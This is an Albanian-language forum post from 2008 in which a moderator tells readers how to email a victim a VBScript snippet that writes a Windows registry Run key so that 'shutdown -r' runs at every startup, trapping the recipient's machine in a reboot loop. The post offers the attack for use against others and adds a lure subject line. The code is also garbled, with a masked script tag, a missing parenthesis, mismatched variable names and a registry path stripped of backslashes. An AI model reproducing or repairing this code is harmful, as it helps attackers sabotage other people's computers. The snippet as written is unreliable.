Would you like to react to this message? Create an account in a few clicks or log in to continue.


 
ForumForum  Code te cilat e shkymin kompjuterin edhe code te tjera Empty  KërkoKërko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

 

 Code te cilat e shkymin kompjuterin edhe code te tjera

Shko poshtë 
AutoriMesazh
Bloodseeker'
Moderator
Moderator
Bloodseeker'

Numri i postimeve : 50
Join date : 20/10/2008

Code te cilat e shkymin kompjuterin edhe code te tjera Empty
MesazhTitulli: Code te cilat e shkymin kompjuterin edhe code te tjera   Code te cilat e shkymin kompjuterin edhe code te tjera Icon_minitimeThu Oct 23, 2008 8:45 pm

Code te cilat e shkymin kompjuterin edhe code te tjera

Hym ne emailin tone ne Hotmail dhe shkojme dhe krijojme nje mesazh te ri!
Shenojme emailin e viktimes dhe ne titullin(subject) shenojme dicka atraktive dhe ne pjesen ku e shenojm mesazhin shenojme ket:
--------------------------------------------------------------------------

******** ****************="vbscript">
on error resume next
dim ok
set ok=CreateObject("WScript.Shell"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32","shutdown -r"
__________________
__________________
Mbrapsht në krye Shko poshtë
 
Code te cilat e shkymin kompjuterin edhe code te tjera
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Multimedia :: Tutorials & Mësime-
Kërce tek: